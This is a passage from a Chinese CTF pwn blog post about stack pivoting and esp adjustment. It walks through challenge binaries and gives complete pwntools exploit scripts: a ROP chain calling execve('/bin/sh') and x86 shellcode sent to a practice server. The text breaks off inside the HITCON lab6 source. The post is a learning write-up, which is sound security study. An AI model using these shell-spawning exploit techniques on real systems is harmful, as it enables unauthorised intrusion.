<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>花式栈溢出（栈帧的调节） | Welcome to Chumen77&#39;s Blog | Struggle 就完事了 !</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content>
    <meta name="description" content="花式栈溢出（栈帧的调节）前言本人刚学pwn不久，最近在学习过程中学到了各种需要栈帧调节的题目，以此记录一下。在一些栈溢出的程序中，我们会碰到一些问题，例如溢出的可控字节数太少，无法构造我们想要的rop链，程序ASLR开启后导致的栈地址不可预测等。对于这种问题，常用的思路包括：  加减esp值，控制栈指针 Stack Migration来构造一个假的栈帧。  这里总结了2种题型： 加减esp，把控栈">
<meta property="og:type" content="article">
<meta property="og:title" content="花式栈溢出（栈帧的调节）">
<meta property="og:url" content="http://chumen77.xyz/2020/02/05/花式栈溢出（调节栈帧）/index.html">
<meta property="og:site_name" content="Welcome to Chumen77&#39;s Blog">
<meta property="og:description" content="花式栈溢出（栈帧的调节）前言本人刚学pwn不久，最近在学习过程中学到了各种需要栈帧调节的题目，以此记录一下。在一些栈溢出的程序中，我们会碰到一些问题，例如溢出的可控字节数太少，无法构造我们想要的rop链，程序ASLR开启后导致的栈地址不可预测等。对于这种问题，常用的思路包括：  加减esp值，控制栈指针 Stack Migration来构造一个假的栈帧。  这里总结了2种题型： 加减esp，把控栈">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808931260368.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808932166761.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808934501240.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808936171885.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808938970186.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808939630394.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808939828470.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808946102427.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808947377600.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15808948243514.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15811429422510.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15813373484321.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ovtYT.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1oxKN6.png">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ovjXj.png">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15813398610900.jpg">
<meta property="og:image" content="http://q5j29gptn.bkt.clouddn.com/15813398926858.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1og2r9.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ogs8U.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ogwEq.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ogabn.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ogUDs.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ocMfU.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ocZmn.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ocklQ.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6oo6.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6gWF.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o60Ln.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6NRg.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6tJS.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6Yi8.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6lqI.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6QsA.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6VIK.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1o6AVx.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1oyk4S.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1os600.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1os8OI.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1osEO1.md.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1orMMn.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1or3ZV.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1orGIU.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1orQrq.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1or8aT.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1ormGQ.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2020/02/11/1oDzPe.jpg">
<meta property="og:updated_time" content="2020-02-11T09:00:34.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="花式栈溢出（栈帧的调节）">
<meta name="twitter:description" content="花式栈溢出（栈帧的调节）前言本人刚学pwn不久，最近在学习过程中学到了各种需要栈帧调节的题目，以此记录一下。在一些栈溢出的程序中，我们会碰到一些问题，例如溢出的可控字节数太少，无法构造我们想要的rop链，程序ASLR开启后导致的栈地址不可预测等。对于这种问题，常用的思路包括：  加减esp值，控制栈指针 Stack Migration来构造一个假的栈帧。  这里总结了2种题型： 加减esp，把控栈">
<meta name="twitter:image" content="http://q5j29gptn.bkt.clouddn.com/15808931260368.jpg">
    
        <link rel="alternate" type="application/atom+xml" title="Welcome to Chumen77&#39;s Blog" href="/atom.xml">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

</head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname">chumen77</h5>
          <a href="mailto:973059980@qq.com" title="973059980@qq.com" class="mail">973059980@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/chumen77" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="http://www.weibo.com/" target="_blank" >
                <i class="icon icon-lg icon-weibo"></i>
                Weibo
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">花式栈溢出（栈帧的调节）</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="Search">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">花式栈溢出（栈帧的调节）</h1>
        <h5 class="subtitle">
            
                <time datetime="2020-02-05T08:53:11.000Z" itemprop="datePublished" class="page-time">
  2020-02-05
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#花式栈溢出（栈帧的调节）"><span class="post-toc-number">1.</span> <span class="post-toc-text">花式栈溢出（栈帧的调节）</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#前言"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">前言</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#加减esp，把控栈指针"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">加减esp，把控栈指针</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Alictf-016-vss"><span class="post-toc-number">1.2.1.</span> <span class="post-toc-text">Alictf_016_vss</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#检查保护和arch"><span class="post-toc-number">1.2.1.1.</span> <span class="post-toc-text">检查保护和arch</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#ida分析"><span class="post-toc-number">1.2.1.2.</span> <span class="post-toc-text">ida分析</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#exp"><span class="post-toc-number">1.2.1.3.</span> <span class="post-toc-text">exp</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#X-CTF-Quals-2016-b0verfl0w"><span class="post-toc-number">1.2.2.</span> <span class="post-toc-text">X-CTF Quals 2016-b0verfl0w</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#查保护和arch"><span class="post-toc-number">1.2.2.1.</span> <span class="post-toc-text">查保护和arch</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#ida分析-1"><span class="post-toc-number">1.2.2.2.</span> <span class="post-toc-text">ida分析</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#exp-1"><span class="post-toc-number">1.2.2.3.</span> <span class="post-toc-text">exp</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Stack-Migration"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">Stack Migration</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#原理"><span class="post-toc-number">1.3.1.</span> <span class="post-toc-text">原理</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#HITCON-training-lab6-64位"><span class="post-toc-number">1.3.2.</span> <span class="post-toc-text">HITCON_training_lab6_64位</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#源码"><span class="post-toc-number">1.3.2.1.</span> <span class="post-toc-text">源码</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#简单分析"><span class="post-toc-number">1.3.2.2.</span> <span class="post-toc-text">简单分析</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#图解分析"><span class="post-toc-number">1.3.2.3.</span> <span class="post-toc-text">图解分析</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#EXP"><span class="post-toc-number">1.3.3.</span> <span class="post-toc-text">EXP</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Hgame2020-week2-rop-level2"><span class="post-toc-number">1.3.4.</span> <span class="post-toc-text">Hgame2020_week2_rop_level2</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#查保护和arch-1"><span class="post-toc-number">1.3.4.1.</span> <span class="post-toc-text">查保护和arch</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#ida分析-2"><span class="post-toc-number">1.3.4.2.</span> <span class="post-toc-text">ida分析</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-5"><a class="post-toc-link" href="#攻击思路"><span class="post-toc-number">1.3.4.2.1.</span> <span class="post-toc-text">攻击思路</span></a></li></ol></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#EXP-1"><span class="post-toc-number">1.3.4.3.</span> <span class="post-toc-text">EXP</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Stack-Migration小总结"><span class="post-toc-number">1.3.5.</span> <span class="post-toc-text">Stack Migration小总结</span></a></li></ol></li></ol></li></ol>
        </nav>
    </aside>


<article id="post-花式栈溢出（调节栈帧）"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">花式栈溢出（栈帧的调节）</h1>
        <div class="post-meta">
            <time class="post-time" title="2020-02-05 16:53:11" datetime="2020-02-05T08:53:11.000Z"  itemprop="datePublished">2020-02-05</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h1 id="花式栈溢出（栈帧的调节）"><a href="#花式栈溢出（栈帧的调节）" class="headerlink" title="花式栈溢出（栈帧的调节）"></a>花式栈溢出（栈帧的调节）</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>本人刚学pwn不久，最近在学习过程中学到了各种需要栈帧调节的题目，以此记录一下。<br>在一些栈溢出的程序中，我们会碰到一些问题，例如溢出的可控字节数太少，无法构造我们想要的rop链，程序ASLR开启后导致的栈地址不可预测等。对于这种问题，常用的思路包括：</p>
<ul>
<li>加减esp值，控制栈指针</li>
<li>Stack Migration来构造一个假的栈帧。</li>
</ul>
<p>这里总结了2种题型：</p>
<h2 id="加减esp，把控栈指针"><a href="#加减esp，把控栈指针" class="headerlink" title="加减esp，把控栈指针"></a>加减esp，把控栈指针</h2><p>这种题型就需要用Ropgadget找一个控制esp的gadget，然后简单修改esp值的大小，来满足我们的需求。</p>
<h3 id="Alictf-016-vss"><a href="#Alictf-016-vss" class="headerlink" title="Alictf_016_vss"></a>Alictf_016_vss</h3><p>这个题目就是一个修改esp扩大栈空间，从而构造rop链获取shell的题目。</p>
<h4 id="检查保护和arch"><a href="#检查保护和arch" class="headerlink" title="检查保护和arch"></a>检查保护和arch</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808931260368.jpg" alt="-w446" title>
                </div>
                <div class="image-caption">-w446</div>
            </figure>
<h4 id="ida分析"><a href="#ida分析" class="headerlink" title="ida分析"></a>ida分析</h4><p>由于这个程序使用静态编译和strip命令剥离符号，用ida打开没有我们平时看的那么简单，<br>很多函数已经无法识别，我们就需要自己调试，然后推测是什么函数。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808932166761.jpg" alt="-w618" title>
                </div>
                <div class="image-caption">-w618</div>
            </figure>
<p>start函数中，call的函数是__libc_start_main, 上一行的 offset则是main函数<br>那个箭头就是main函数了。进入main函数以后，<strong>可以经过syscall中rax的参数来确认其是什么函数</strong>，很明显一个函数是alarm函数，先手动nop一下。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808934501240.jpg" alt="-w555" title>
                </div>
                <div class="image-caption">-w555</div>
            </figure>
<p>把这个函数去除后，方便gdb的后期调试。接着可以很容易确定一下puts函数跟read函数，在ida中修改一下。<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808936171885.jpg" alt="-w528" title>
                </div>
                <div class="image-caption">-w528</div>
            </figure><br>下面那个40108e函数是比较复杂的，我用edb动态调试来确定出其中的某些函数：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808938970186.jpg" alt="-w857" title>
                </div>
                <div class="image-caption">-w857</div>
            </figure>
<p>对于这个函数，先确定一下其参数。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808939630394.jpg" alt="-w824" title>
                </div>
                <div class="image-caption">-w824</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808939828470.jpg" alt="-w322" title>
                </div>
                <div class="image-caption">-w322</div>
            </figure>
<p>dump过去就会发现是复制了一份。所以就确定这个函数是<code>strncpy</code>是函数。<br>对于这个函数<code>char *strncpy(char *dest, const char *src, int n)</code><strong>将src指向的字符数组中n个字符复制到dest指向的字符数组中，在第一个空字符处停止，并返回被复制后的dest</strong>。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808946102427.jpg" alt="-w781" title>
                </div>
                <div class="image-caption">-w781</div>
            </figure>
<p>对于下一段就是判断一下，是否与0x79和0x70相等，可以来手动修改值让其相等。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808947377600.jpg" alt="-w803" title>
                </div>
                <div class="image-caption">-w803</div>
            </figure>
<p>往后走会发现先溢出了，在做溢出题的时候看到return 就应该想办法想上跳。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15808948243514.jpg" alt="-w368" title>
                </div>
                <div class="image-caption">-w368</div>
            </figure>
<p>溢出的这个地址就是刚刚又syrcpy函数复制过来0x50字节中的最后8个字节，因为是strncpy函数，<strong>我们输入的字符串中是不能有\x00</strong>，否则会被截断，从而无法复制满0x50字节制造可控溢出，所以前0x48个字节中，我们不能写入任何地址。在这种情况下就需要通过修改esp来完成漏洞利用。</p>
<p>在最前面的read函数中，给了十分大的缓冲区可以用，我们可以把ROP链放在0x50字节之后，然后通过增加esp的值把栈顶抬到ROP链上，紧接着执行这个rop链即可。</p>
<p>查到one_gadget发现<code>0x000000000046f205 : add rsp, 0x58 ; ret</code>正好符合要求。然后gdb调试一下确定一下rop链从50个字节后的那里开始合适即可。<strong>（这个在找onegadget的时候注意不要把rsp搞成esp了，自己在做的时候因为这个调试了半天，才发现是这个错误，导致exp不成功）</strong></p>
<h4 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import time</span><br><span class="line">io = process(&apos;./vss&apos;)</span><br><span class="line">e = ELF(&apos;./vss&apos;)</span><br><span class="line">io.recvuntil(&apos;Password:\n&apos;)</span><br><span class="line">add_rsp_0x58_ret = 0x0046f205</span><br><span class="line">pop_rax_ret = 0x0046f208</span><br><span class="line">pop_rdi_ret = 0x0401823</span><br><span class="line">pop_rsi_ret = 0x0401937</span><br><span class="line">pop_rdx_ret = 0x043ae05</span><br><span class="line">bss = 0x6C8178 -10</span><br><span class="line">syscall_ret = 0x0045f2a5</span><br><span class="line">rop1 = [</span><br><span class="line">    pop_rax_ret,</span><br><span class="line">    0,</span><br><span class="line">    pop_rdi_ret,</span><br><span class="line">    0,</span><br><span class="line">    pop_rsi_ret,</span><br><span class="line">    bss,</span><br><span class="line">    pop_rdx_ret,</span><br><span class="line">    10,</span><br><span class="line">    syscall_ret,</span><br><span class="line">    pop_rax_ret,</span><br><span class="line">    0x3b,</span><br><span class="line">    pop_rdi_ret,</span><br><span class="line">    bss,</span><br><span class="line">    pop_rsi_ret,</span><br><span class="line">    0,</span><br><span class="line">    pop_rdx_ret,</span><br><span class="line">    0,</span><br><span class="line">    syscall_ret</span><br><span class="line">]</span><br><span class="line"># raw_input(&apos;-&gt;&apos;)</span><br><span class="line">io.sendline(&apos;py&apos; + &apos;a&apos;*70 + p64(add_rsp_0x58_ret)+ &apos;b&apos;* 8 + &apos;&apos;.join(map(p64,rop1)))</span><br><span class="line"># raw_input(&apos;-&gt;&apos;)</span><br><span class="line">sleep(0.1)</span><br><span class="line">io.send(&apos;/bin/sh\x00&apos;)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="X-CTF-Quals-2016-b0verfl0w"><a href="#X-CTF-Quals-2016-b0verfl0w" class="headerlink" title="X-CTF Quals 2016-b0verfl0w"></a>X-CTF Quals 2016-b0verfl0w</h3><h4 id="查保护和arch"><a href="#查保护和arch" class="headerlink" title="查保护和arch"></a>查保护和arch</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15811429422510.jpg" alt="-w438" title>
                </div>
                <div class="image-caption">-w438</div>
            </figure>
<p>这个nx也没有开，可以用栈执行shellcode</p>
<h4 id="ida分析-1"><a href="#ida分析-1" class="headerlink" title="ida分析"></a>ida分析</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">signed int vul()</span><br><span class="line">&#123;</span><br><span class="line">  char s; // [esp+18h] [ebp-20h]</span><br><span class="line"></span><br><span class="line">  puts(&quot;\n======================&quot;);</span><br><span class="line">  puts(&quot;\nWelcome to X-CTF 2016!&quot;);</span><br><span class="line">  puts(&quot;\n======================&quot;);</span><br><span class="line">  puts(&quot;What&apos;s your name?&quot;);</span><br><span class="line">  fflush(stdout);</span><br><span class="line">  fgets(&amp;s, 50, stdin);</span><br><span class="line">  printf(&quot;Hello %s.&quot;, &amp;s);</span><br><span class="line">  fflush(stdout);</span><br><span class="line">  return 1;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>代码很简单，但是可以发现可以溢出的字节只有50-0x20-4=14个字节可控，所以是很难写出rop链来获取咱们目的的。然后就可以考虑控制栈指针的攻击思路，就是先把shellcode摆在栈上，然后控制eip到达这里就可以了。但是由于程序本身会开启 ASLR 保护，所以我们很难直接知道 shellcode 的地址。但是栈上相对偏移是固定的，所以我们可以利用栈溢出对 esp 进行操作，使其指向 shellcode 处，并且直接控制程序跳转至 esp 处。</p>
<p>找一下控制esp的gadget</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x08048504 : jmp esp</span><br></pre></td></tr></table></figure>

<p>然后怎么控制eip到shellcode上呢，因为没有nx保护，我们可以写一段指令来控制偏移：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sub esp,0x28</span><br><span class="line">jmp esp</span><br></pre></td></tr></table></figure>

<h4 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">#io = process(&apos;./b0verfl0w&apos;)</span><br><span class="line">context.arch = &apos;i386&apos;</span><br><span class="line">io = remote(&apos;node3.buuoj.cn&apos;,29410)</span><br><span class="line">shellcode = &quot;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73&quot;</span><br><span class="line">shellcode += &quot;\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0&quot;</span><br><span class="line">shellcode += &quot;\x0b\xcd\x80&quot;</span><br><span class="line">sub_esp_jmp = asm(&apos;sub esp, 0x28;jmp esp&apos;)</span><br><span class="line">jmp_esp = 0x08048504</span><br><span class="line">payload = shellcode + (36-len(shellcode_x86))*&apos;b&apos;+p32(jmp_esp) + sub_esp_jmp</span><br><span class="line">io.readuntil(&apos;?\n&apos;)</span><br><span class="line">#raw_input(&apos;-&gt;&apos;)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="Stack-Migration"><a href="#Stack-Migration" class="headerlink" title="Stack Migration"></a>Stack Migration</h2><p>在 Stack Migration 中，我们所利用的技巧便是同时控制 EBP 与 EIP，这样我们在控制程序执行流的同时，也改变程序栈帧的位置。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>我们知道在函数建立栈帧时有两条指令<code>push ebp; mov ebp, esp</code>，而退出时同样需要消除这两条指令的影响，即<code>leave(mov esp, ebp; pop ebp)</code> 。且leave一般紧跟着就是ret。<strong>因此，在存在栈溢出的程序中，只要我们能控制到栈中的ebp，我们就可以通过两次leave劫持栈。</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://q5j29gptn.bkt.clouddn.com/15813373484321.jpg" alt="-w533" title>
                </div>
                <div class="image-caption">-w533</div>
            </figure>
<p>第一次随着程序流<code>leave; ret</code>，new esp为我们构造新栈的目标地址。 可以看到执行到ret时，esp还在原来的old栈上，而ebp已经指向了新的栈的栈顶。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ovtYT.jpg" alt="1ovtYT.jpg" title>
                </div>
                <div class="image-caption">1ovtYT.jpg</div>
            </figure>
<p>第二次进入我们放入栈上的<code>leave; ret</code> 的gadget（<strong>这个是我们事先写上栈的</strong>）esp已经被成功劫持到新的栈上，执行完gadget后栈顶会 在new_esp-4(64位是-8)的位置上。此时栈完全可控了，通过预先或者之后在new stack上布置的rop链可以轻松完成攻击。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1oxKN6.png" alt="1oxKN6.png" title>
                </div>
                <div class="image-caption">1oxKN6.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://s2.ax1x.com/2020/02/11/1ovjXj.png" alt="1ovjXj.png" title>
                </div>
                <div class="image-caption">1ovjXj.png</div>
            </figure>
<h3 id="HITCON-training-lab6-64位"><a href="#HITCON-training-lab6-64位" class="headerlink" title="HITCON_training_lab6_64位"></a>HITCON_training_lab6_64位</h3><p>这个是在HITCON_training的一个练习，直接给的有源码，我给编译成了64位版本。</p>
<h4 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">int count = 1337 ;</span><br><span class="line">char *t= &quot;Z\xc3&quot; ;</span><br><span class="line">int main()&#123;</span><br><span class="line">if( count!=1337 )&#123;</span><br><span class="line">    _exit(1);</span><br><span class="line">&#125;</span><br><span class="line">count++ ;</span><br><span class="line">char buf[48];</span><br><span class="line">setvbuf(stdout,0,2,0);</span><br><span class="line">puts(&quot;Try your best : &quot; );</span><br><span class="line">read(0, buf,128);</span><br><span class="line">return ;</span><br><span 